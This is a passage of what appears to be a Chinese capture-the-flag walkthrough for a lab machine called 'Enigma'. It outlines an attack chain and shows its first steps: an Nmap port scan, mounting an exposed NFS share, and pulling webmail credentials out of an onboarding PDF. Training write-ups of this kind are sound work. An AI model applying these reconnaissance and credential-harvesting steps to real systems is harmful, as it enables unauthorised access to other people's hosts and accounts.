[特殊字符] Enigma 靶机完整解题攻略
🔍 Nmap → 🗂️ NFS (PDF) → 📧 Kevin/Sarah 邮箱 → 📩 Web 凭据 (OpenSTAManager) → 💥 RCE → 💻 Shell → 🗄️ DB (Haris) → 🚩 User Flag → 🔍 OliveTin (Shell内利用) → 🚩 Root Flag第一阶段:获取 User Flag (user.txt)1️⃣全端口扫描使用 Nmap 对目标进行全面扫描,识别所有开放的 TCP 服务。nmap -sC -sV -p- 10.129.66.198 Starting Nmap 7.94 ( https://nmap.org ) Nmap scan report for 10.129.66.198 Host is up (0.022s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 a4:... 80/tcp open http nginx 1.24.0 |_http-server-header: nginx/1.24.0 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 2049/tcp open nfs_acl 3 (RPC #100227) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel分析:发现2049/tcp (NFS)端口开放,存在信息泄露风险。2️⃣挂载 NFS 共享查看 NFS 导出列表,挂载共享目录,发现敏感文件。showmount -e 10.129.66.198 Export list for 10.129.66.198: /srv/nfs/onboarding * mkdir /mnt/nfs mount -t nfs 10.129.66.198:/srv/nfs/onboarding /mnt/nfs ls -la /mnt/nfs total 20 -rw-r--r-- 1 root root 12345 Jul 1 05:20 New_Employee_Access.pdf3️⃣提取 PDF 凭据读取 PDF 内容,获取用户邮箱访问信息。pdftotext /mnt/nfs/New_Employee_Access.pdf - ... Webmail Access URL:http://mail001.enigma.htb Username:kevin Password:Enigma2024! ...

相关新闻